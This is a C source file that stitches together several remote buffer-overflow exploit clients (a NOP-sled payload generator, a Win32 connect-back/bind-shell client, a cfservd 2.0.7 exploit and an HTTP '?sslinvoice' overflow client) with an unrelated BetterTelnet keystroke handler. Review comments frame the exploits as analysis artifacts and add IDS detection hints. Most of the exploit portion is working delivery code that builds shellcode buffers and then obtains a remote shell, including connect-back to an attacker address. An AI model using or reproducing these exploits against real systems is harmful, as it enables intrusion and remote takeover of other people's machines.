/*
 * Review note: this is an exploit-generator artifact kept for analysis; it is
 * documented here, not improved. main() fills a 416-byte buffer with 0x90
 * bytes, appends the `cb` byte template (after changeip()/changeport() patch an
 * address and port into it), pads to POE with a repeated 4-byte value taken
 * from `addys`, NUL-terminates, and writes the result to stdout. changeip,
 * changeport, IP, PORT, PORT_OFFSET, cb, addys, ADDY and POE are all defined
 * outside this view.
 *
 * Defensive use: the output shape -- a long run of 0x90 followed by a short
 * byte sequence and then the same 4-byte value repeated -- is what a content
 * scanner or IDS signature should key on when this material appears on the
 * wire or on disk.
 */
int main (void) { char buff[416]; int a; changeip(IP); changeport(cb, PORT, PORT_OFFSET);
/* 200 bytes of 0x90, then the template, then 4-byte repeats up to POE. */
for (a = 0; a < 200; a++) *(buff+a) = 0x90; for (int b = 0; *(cb+b); a++, b++) *(buff+a) = *(cb+b); for (; a + 4 <= POE; a += 4) memcpy(buff+a, (addys+ADDY), 4); *(buff+a) = 0;
/* Output length is strlen(buff): it stops at the first NUL byte in the buffer. */
fwrite(buff, strlen(buff), 1, stdout); return(0); }
/*
 * Review note: Win32-side exploit client (WSAStartup/Sleep/SOCKET), kept for
 * analysis and documented rather than improved. Flow:
 *   1. Option parsing: -h host is required; -l selects 'listening' mode, which
 *      additionally requires -i (the address patched into `connback`);
 *      -t picks an entry of the `targets` table for `retaddr`.
 *   2. The global `buff` (BSIZE bytes) is filled with NOP, `retaddr` is written
 *      repeatedly at buff+align, and the selected template (`connback` or
 *      `bindport`, after changeport() patches `port` in) is copied to
 *      buff+retsize+sc_offset. do_send() (defined outside this view) delivers it.
 *   3. Post-delivery channel: in listening mode this process binds `port` and
 *      waits for an inbound connection; in connecting mode it polls the target
 *      on `port` every `interval` seconds until connect() succeeds. Either
 *      socket is handed to doshell().
 * buff, BSIZE, NOP, targets, connback, bindport, the SC_*/RET_*/ALIGN/PORT/
 * TIME_OUT/INTERVAL/PORT_OFFSET_* constants and usage, showtargets, banner,
 * err_exit, do_send, resetalarm and doshell are defined outside this view.
 *
 * Defensive use: the observable sequence is one delivery payload followed,
 * after roughly one second, by a new TCP session on `port` -- inbound to the
 * attacker host or outbound from the victim -- carrying an interactive shell.
 * A new listener/connection on an unusual port immediately after a
 * malformed request is the event to alert on.
 *
 * Code observations (not changed): `opt` is declared char and compared to
 * EOF, which is not portable where char is unsigned; the "Connecting" printf
 * passes `port` without a matching conversion; `retaddr` is only assigned
 * when -t is given.
 */
int main(int argc, char *argv[]) { char opt; char *host, *ptr, *ip=""; struct sockaddr_in sockadd; int i, i_len, ok=0, mode=0, flag=0; int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET; int target=TARGET, scsize=SC_SIZE_1, port=PORT; int timeout=TIME_OUT, interval=INTERVAL; long retaddr; WSADATA wsd; SOCKET s1, s2; if (argc<2) { usage(argv[0]); }
/* Option parsing (see header). */
while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) { switch(opt) { case 'a': align=atoi(optarg); break; case 'I': interval=atoi(optarg); break; case 'T': timeout=atoi(optarg); break; case 't': target=atoi(optarg); retaddr=targets[target-1].jmpesp; break; case 'i': ip=optarg; changeip(ip); break; case 'l': mode=1; scsize=SC_SIZE_2; break; case 'r': retsize=atoi(optarg); break; case 's': sc_offset=atoi(optarg); break; case 'h': ok=1; host=optarg; sockadd.sin_addr.s_addr=inet_addr(optarg); break; case 'p': port=atoi(optarg); break; case 'H': showtargets(); break; default: usage(argv[0]); break; } } if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }
/* Buffer construction and socket setup; the size check happens after the retaddr writes. */
memset(buff,NOP,BSIZE); ptr=buff+align; for(i=0;i<retsize;i+=4) { *((long *)ptr)=retaddr; ptr+=4; } if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) { err_exit("-> WSAStartup error...."); } if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { err_exit("-> socket() error..."); } sockadd.sin_family=AF_INET; sockadd.sin_port=htons((SHORT)port); ptr=buff+retsize+sc_offset; if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'.."); banner();
/* Listening mode: deliver, then accept one inbound connection on `port`. */
if (mode) { printf("-> 'Listening' mode...( port: %d )\n",port); changeport(connback, port, PORT_OFFSET_2); for(i=0;i<scsize;i++) { *ptr++=connback[i]; } do_send(host,timeout); Sleep(1000); sockadd.sin_addr.s_addr=htonl(INADDR_ANY); i_len=sizeof(sockadd); if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) { err_exit("-> bind() error"); } if (listen(s1,0)<0) { err_exit("-> listen() error"); } printf("-> Waiting for connection...\n"); s2=accept(s1,(struct sockaddr *)&sockadd,&i_len); if (s2<0) { err_exit("-> accept() error"); } printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr)); resetalarm(); doshell(s2); }
/* Connecting mode: deliver, then poll the target on `port` every `interval` seconds. */
else { printf("-> 'Connecting' mode...\n",port); changeport(bindport, port, PORT_OFFSET_1); for(i=0;i<scsize;i++) { *ptr++=bindport[i]; } do_send(host,timeout); Sleep(1000); printf("-> Will try connecting to shell now....\n"); i=0; while(!flag) { Sleep(interval*1000); if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { printf("-> Trial #%d....\n",i++); } else { flag=1; } } printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port); resetalarm(); doshell(s1); } return 0; }
/*
 * Review note: POSIX-side exploit client for cfservd (per its own banner
 * string), kept for analysis and documented rather than improved. Flow:
 *   1. Option parsing: -h host is required; -l selects 'listening' mode, which
 *      additionally requires -i (the address patched into `connback`).
 *   2. A heap buffer of buffsize+1 bytes is built as: HDR_SIZE+align bytes of
 *      HDR, NOP padding, the selected template (`connback` or `bindport` after
 *      changeport() patches s_port in), retsize bytes of `ret_addr`
 *      (RET_ADDR minus -o offset), then a NUL.
 *   3. The buffer is sent to host:t_port. In listening mode the process forks:
 *      the child sends after 2 s while the parent binds s_port under an
 *      alarm(time_out) guard and accepts one inbound connection; in connecting
 *      mode it sends, waits 2 s and connects to host:s_port. The resulting
 *      socket goes to sendcmd() and doshell().
 * changeip, changeport, usage, err_exit, sigalrm, sendcmd, doshell, connback,
 * bindport and the HDR/NOP/SC_SIZE_*/RET_*/ALIGN/BUFF_SIZE/S_PORT/T_PORT/
 * TIME_OUT/PORT_OFFSET_* constants are defined outside this view.
 *
 * Defensive use: the sequence to alert on is a cfservd request whose body is
 * a long run of HDR/NOP bytes, followed within seconds by a new TCP session
 * on s_port between the same two hosts.
 *
 * Code observations (not changed): `opt` is char compared to EOF (not
 * portable where char is unsigned); the parent calls wait() with no argument;
 * the NOP loop count (buffsize-HDR_SIZE-align-scsize-retsize) can go negative
 * for small -b values.
 */
int main(int argc, char *argv[]) { char opt; char *buf, *ptr, *ip=""; struct sockaddr_in sockadd; int i, s1, s2, i_len, ok=0, mode=0; int time_out=TIME_OUT, scsize=SC_SIZE_1; int s_port=S_PORT, t_port=T_PORT, offset=RET_OFFSET; int retsize=RET_SIZE, align=ALIGN, buffsize=BUFF_SIZE; long ret_addr; if (argc<2) { usage(argv[0]); }
/* Option parsing (see header). */
while ((opt=getopt(argc,argv,"i:r:b:a:h:t:s:o:T:l"))!=EOF) { switch(opt) { case 'i': ip=optarg; changeip(ip); break; case 'l': mode=1; scsize=SC_SIZE_2; break; case 'T': time_out=atoi(optarg); break; case 'b': buffsize=atoi(optarg); break; case 'a': align=atoi(optarg); break; case 'h': ok=1; sockadd.sin_addr.s_addr = inet_addr(optarg); break; case 'r': retsize=atoi(optarg); break; case 't': t_port=atoi(optarg); break; case 's': s_port=atoi(optarg); break; case 'o': offset=atoi(optarg); break; default: usage(argv[0]); break; } } if (!ok || (mode&&((strcmp(ip,"")==0)) ) ) { usage(argv[0]); }
/* Buffer construction (see header for the layout). */
if (!(buf=malloc(buffsize+1))) { err_exit("-> malloc() error"); } ret_addr=RET_ADDR-offset; fprintf(stdout,"\nCfservd Remote Exploit by snooq [ [email protected] ]\n"); fprintf(stdout,"Tested to work against cfservd 2.0.7 on Redhat 8.0\n\n"); fprintf(stdout,"-> Using return address of 0x%08x\n", ret_addr); ptr=buf; for(i=0;i<HDR_SIZE+align;i++) { *ptr++=HDR; } for(i=0;i<(buffsize-HDR_SIZE-align-scsize-retsize);i++) { *ptr++=NOP; } if (mode) { changeport(connback, s_port, PORT_OFFSET_2); for(i=0;i<scsize;i++) { *ptr++=connback[i]; } } else { changeport(bindport, s_port, PORT_OFFSET_1); for(i=0;i<scsize;i++) { *ptr++=bindport[i]; } } for(i=0;i<retsize;i+=4) { *((long *)ptr)=ret_addr; ptr+=4; } *ptr++=0;
/* Delivery connection to host:t_port. */
sockadd.sin_family = AF_INET; sockadd.sin_port = htons(t_port); if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) { err_exit("-> socket error"); } if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { err_exit("-> connect() error"); }
/* Listening mode: child sends after 2 s; parent binds s_port under alarm(time_out) and accepts. */
if (mode) { fprintf(stdout,"-> 'Listening' mode...( port: %d )\n",s_port); if (fork()==0) { sleep(2); if (send(s1,buf,buffsize,0)<0) { err_exit("-> send() error"); } fprintf(stdout,"-> Exploit string sent....\n"); exit(0); } else { signal(SIGALRM,sigalrm); alarm(time_out); if ((s2=socket(AF_INET,SOCK_STREAM,0))<0) { err_exit("-> socket error"); } memset(&sockadd,0,sizeof(sockadd)); sockadd.sin_family = AF_INET; sockadd.sin_port = htons(s_port); sockadd.sin_addr.s_addr = htonl(INADDR_ANY); i_len=sizeof(sockadd); if (bind(s2,(struct sockaddr *)&sockadd,i_len)<0) { err_exit("-> bind() error"); } if (listen(s2,0)<0) { err_exit("-> listen() error"); } wait(); close(s1); fprintf(stdout,"-> Waiting for connection....\n"); s1=accept(s2,(struct sockaddr *)&sockadd,&i_len); if (s1<0) { err_exit("-> accept() error"); } alarm(0); fprintf(stdout,"-> Connection from: %s\n",inet_ntoa(sockadd.sin_addr)); sendcmd(s1); doshell(s1); } }
/* Connecting mode: send, wait 2 s, then connect to host:s_port once. */
else { if (send(s1,buf,buffsize,0)<0) { err_exit("-> send() error"); } close(s1); fprintf(stdout,"-> 'Connecting' mode...\n"); fprintf(stdout,"-> Exploit string sent. Waiting for a shell...\n"); sleep(2); sockadd.sin_family = AF_INET; sockadd.sin_port = htons(s_port); if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) { err_exit("-> socket() error"); } if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n"); exit(0); } fprintf(stdout,"-> Connecting to shell at %s:%d\n",inet_ntoa(sockadd.sin_addr),s_port); sendcmd(s1); doshell(s1); } return(0); }
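/*
 * process_key -- handle one keystroke typed into a telnet window.
 *
 * ascii: the key's byte value.
 * tw:    the window/session record. Reads and updates its line-mode state
 *        (litNext, lmodeBits, slc[], slcLevel[], kblen, timing, enabled,
 *        echo, allow_flow) and writes to the network port tw->port.
 *
 * Order of checks; each stage may consume the key and return:
 *   1. literal-next: the key is buffered with no interpretation (armed by
 *      SLC_LNEXT below).
 *   2. TRAPSIG (lmodeBits & 2): the IP/SUSP/ABORT/BRK special characters are
 *      turned into IAC commands, optionally followed by IAC DM sent as urgent
 *      data (SLC_FLUSHIN) and/or DO TIMING-MARK (SLC_FLUSHOUT).
 *   3. SOFT_TAB: a tab is expanded into spaces in the keyboard buffer.
 *   4. L_EDIT: local line editing (erase char/line/word, EOF, redraw, local
 *      flow control, forwarding characters); any other key is buffered.
 *      Outside L_EDIT a CR goes out as CR NUL and every other key is sent as is.
 *   5. Local echo of whatever reached the end of the chain: printable bytes
 *      verbatim, control bytes as ^X unless L_LIT_ECHO is set.
 *
 * Fix in this revision: the erase-character (SLC_EC) and erase-word (SLC_EW)
 * paths check tw->kblen before reading tw->kbbuf[kblen-1] or decrementing.
 * Previously an erase on an empty buffer read before the start of kbbuf and
 * drove kblen negative (the word-erase loop could walk backwards out of the
 * buffer until it happened to find a space byte).
 */
void process_key(unsigned char ascii,struct WindRec *tw)
{
    if (tw->litNext) {
        /* Previous key was SLC_LNEXT: buffer this one without interpretation. */
        tw->litNext = FALSE;
        kbwrite(tw, &ascii, 1);
        if (tw->echo) {
            if (ascii>31 && ascii <127) {   /* printable: show it locally */
                parse(tw, &ascii, 1);
            }
            return;
        }
        /* NOTE(review): with echo off the key falls through to the editing
         * logic below even though it was already buffered -- presumably
         * unintended; confirm against callers before moving the return. */
    }

    if (tw->lmodeBits & 2) {    /* TRAPSIG mode active */
        unsigned char toSend[2] = {IAC,0};
        short whichSignal = 0;

        if (ascii == tw->slc[SLC_IP]) {
            whichSignal = SLC_IP;
            toSend[1] = TEL_IP;
        }
        else if (ascii == tw->slc[SLC_SUSP]) {
            whichSignal = SLC_SUSP;
            toSend[1] = TEL_SUSP;
        }
        /* RAB BetterTelnet 2.0b1: parse.h defaults send ABORT on ^\, which is
         * usually right; change it in parse.h (not here) if BRK suits your
         * configuration better. */
        else if (ascii == tw->slc[SLC_ABORT]) {
            whichSignal = SLC_ABORT;
            toSend[1] = TEL_ABORT;
        }
        else if (ascii == tw->slc[SLC_BRK]) {   /* RAB BetterTelnet 2.0b1 */
            whichSignal = SLC_BRK;
            toSend[1] = TEL_BREAK;
        }

        if (toSend[1]) {    /* we have a signal to send */
            tw->kblen=0;    /* discard anything typed ahead */
            netpush(tw->port);
            netwrite(tw->port,toSend,2);    /* IAC <command> */
            if (tw->slcLevel[whichSignal] & SLC_FLUSHIN) {
                unsigned char dm[2] = {IAC,TEL_DM};
                netpush(tw->port);
                netUrgent();    /* next write goes out as urgent data */
                netwrite(tw->port,dm,2);    /* IAC DM */
            }
            if (tw->slcLevel[whichSignal] & SLC_FLUSHOUT) {
                unsigned char tm[3] = {IAC,TEL_DOTEL,N_TIMING};
                tw->timing = 1; /* remember to wait for WILL TIMING-MARK */
                netpush(tw->port);
                netwrite(tw->port,tm,3);    /* DO TIMING-MARK */
            }
            return;
        }
    }

    if ((tw->lmodeBits & L_SOFT_TAB)&&(ascii == 0x09)) {
        /* SOFT_TAB: expand the tab into spaces in the keyboard buffer. */
        short numSpaces = VSIgetNextTabDistance();
        unsigned char spacechar = ' ';
        while (numSpaces-- > 0) {
            kbwrite(tw, &spacechar, 1);
        }
        if (tw->echo) parse(tw, &ascii, 1);
        return;
    }

    if (tw->lmodeBits & L_EDIT) {   /* local line editing */
        if (ascii == '\015') {  /* CR: flush the buffered line, then CR LF */
            kbflush(tw);
            netpush(tw->port);
            netwrite(tw->port,"\015\012",2);
            if (tw->echo) parse(tw,(unsigned char *) "\012\015",2);
            return;
        }
        if (ascii == tw->slc[SLC_EC]) { /* erase character */
            /* Only when something is buffered: never let kblen go below 0. */
            if (tw->kblen > 0) {
                if (tw->echo) parse(tw,(unsigned char *) "\010 \010",3);
                tw->kblen--;
            }
            return;
        }
        else if (ascii == tw->slc[SLC_AO]) {    /* treated as erase line */
            while (tw->kblen >0) {
                if (tw->echo) parse(tw,(unsigned char *) "\010 \010",3);
                tw->kblen--;
            }
            return;
        }
        else if (ascii == tw->slc[SLC_EL]) {    /* erase line */
            while (tw->kblen >0) {
                if (tw->echo) parse(tw,(unsigned char *) "\010 \010",3);
                tw->kblen--;
            }
            return;
        }
        else if ((ascii == tw->slc[SLC_EOF]) && (tw->lmodeBits & 2)) {
            /* Flush the buffer and send IAC EOF (RAB BetterTelnet 2.0b1: only
             * under TRAPSIG). The ^D itself is deliberately NOT left in the
             * keyboard buffer: on *BSD a stale ^D flushed later by another key
             * (arrows, for instance) after a ^D-terminated cat caused a logout. */
            char eofString[2] = { IAC, TEL_EOF };
            kbflush(tw);
            netpush(tw->port);
            netwrite(tw->port,eofString, 2);
            return;
        }
        /* RAB BetterTelnet 2.0b1: SUSP is handled by the TRAPSIG block above,
         * not here -- it is a TRAPSIG character, not an EDIT one. */
        else if (ascii == tw->slc[SLC_EW]) {    /* erase word */
            /* Bound check first: kbbuf[kblen-1] is only valid while kblen > 0. */
            while ((tw->kblen > 0)&&(tw->kbbuf[tw->kblen-1] != 0x20)) {
                if (tw->echo) parse(tw,(unsigned char *)"\010 \010",3);
                tw->kblen--;
            }
            /* NOTE(review): no return here, so the EW key itself reaches the
             * local-echo block below and is shown as ^X -- confirm intended. */
        }
        else if (ascii == tw->slc[SLC_RP]) {    /* reprint line */
            VSredrawLine(tw->vs);
            return;
        }
        else if (ascii == tw->slc[SLC_LNEXT]) { /* next key is literal */
            tw->litNext = TRUE;
            return;
        }
        else if (ascii == tw->slc[SLC_XON]) {
            if (tw->allow_flow) {   /* remote flow control can disable this */
                tw->enabled = 1;    /* (RAB BetterTelnet 2.0b1 fix) */
                changeport(scrn, scrn);
            }
            return;
        }
        else if (ascii == tw->slc[SLC_XOFF]) {
            if (tw->allow_flow) {   /* remote flow control can disable this */
                tw->enabled = 0;
                changeport(scrn, scrn);
            }
            return;
        }
        else if ((ascii == tw->slc[SLC_FORW1])||(ascii == tw->slc[SLC_FORW1])) {
            /* NOTE(review): both sides of this || test SLC_FORW1; the second
             * was presumably meant to be the second forwarding character --
             * confirm against parse.h before changing. */
            kbflush(tw);
            netwrite(tw->port,&ascii,1);
            return;
        }
        else {
            /* Past every editing function: an ordinary key, buffer it. */
            kbwrite(tw, &ascii, 1);
        }
    }
    else if (ascii == '\015') { /* CR outside edit mode goes out as CR NUL */
        unsigned char toSend[2] = {0x0D,0x00};
        netpush(tw->port);
        netwrite(tw->port,toSend,2);
        if (tw->echo) parse(tw,(unsigned char *) "\012\015",2);
        return;
    }
    else {  /* not editing: send the key as is */
        netpush(tw->port);
        netwrite( tw->port, &ascii, 1);
    }

    if (tw->echo) { /* local echo */
        if (ascii>31 && ascii <127) {   /* printable */
            parse(tw, &ascii, 1);
        }
        else {  /* control byte: shown as ^X unless literal echo is requested */
            if (!(tw->lmodeBits & L_LIT_ECHO)) {
                /* '@'+ascii maps 0x01..0x1A to 'A'..'Z'; bytes >= 0x80 wrap
                 * in unsigned char -- existing behaviour, left as is. */
                ascii='@'+ascii;
                parse(tw,(unsigned char *) "^",1);
                parse(tw, &ascii, 1);
            }
        }
    }
}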
/*
 * Review note: HTTP-delivered exploit client, kept for analysis and
 * documented rather than improved. Flow:
 *   1. Options: -i host, -l location and -1 cbip are required; -p port,
 *      -o offset (hex) and -2 cbport have defaults (PORT, OFFSET, CB_PORT).
 *   2. changeip()/changeport() patch cbip/cbport into the `cb` template
 *      (helpers, template, OFFSET/PORT/CB_PORT/PORT_OFFSET and help() are
 *      defined outside this view).
 *   3. The client resolves host, connects to host:port and sends
 *      "GET <location>?sslinvoice HTTP/1.1" with a Content-Length of
 *      4000 + sizeof(cb) + 512 - 1 + 6.
 *   4. The body reuses buff: 4000 bytes of 0x90, the cb template, 128 copies
 *      of the 4-byte `offset`, then "Submit\n" at a fixed position.
 *
 * Defensive use: a GET request carrying a multi-kilobyte Content-Length, a
 * body dominated by 0x90 bytes and a `?sslinvoice` query is the pattern a WAF
 * or IDS rule should match; the follow-on indicator is a new connection from
 * the web host to cbip:cbport.
 *
 * Code observations (not changed): sprintf() formats the argv-controlled
 * `location` and `host` into the fixed 5120-byte buff with no bound; the
 * send() return values are ignored; main() has no return statement (valid
 * under C99, where it is treated as return 0).
 */
int main (int argc, char **argv) { int sock; unsigned offset = OFFSET, ipaddr, i = 0; unsigned short port = PORT, cbport = CB_PORT; struct sockaddr_in server; char *host, *location, *cbip, buff[5120], opt; host = location = cbip = 0;
/* Option parsing (see header). */
while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) { switch(opt) { case 'i': host = optarg; break; case 'p': sscanf(optarg, "%hu", &port); break; case 'o': sscanf(optarg, "%x", &offset); break; case 'l': location = optarg; break; case '1': cbip = optarg; break; case '2': sscanf(optarg, "%hu", &cbport); break; } } if (!(host && location && cbip)) { puts("-!> a required argument was missing\n"); help(); exit(1); } changeip(cbip); changeport(cb, cbport, PORT_OFFSET);
/* Name resolution and TCP connect to host:port. */
if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) { printf("socket() error: %s\n", strerror(errno)); exit(1); } server.sin_port = htons(port); if ((ipaddr = inet_addr(host)) == -1) { struct hostent *myhost; if ((myhost = gethostbyname(host)) == 0) { printf("-!> failed to resolve host '%s'\n", host); exit(1); } memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length); } else server.sin_addr.s_addr = ipaddr; server.sin_family = AF_INET; memset(&(server.sin_zero), 0, 8); if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) { printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno)); exit(1); }
/* Request header, then the body (see header for its layout); both sent with send(). */
sprintf(buff, "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n", location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit")); send(sock, buff, strlen(buff), 0); for (0; i < 4000; i++) *(buff+i) = 0x90; for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++) *(buff+i) = *(cb+a); for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4); strcpy(buff+4000+sizeof(cb)+512 - 1, "Submit\n"); send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0); }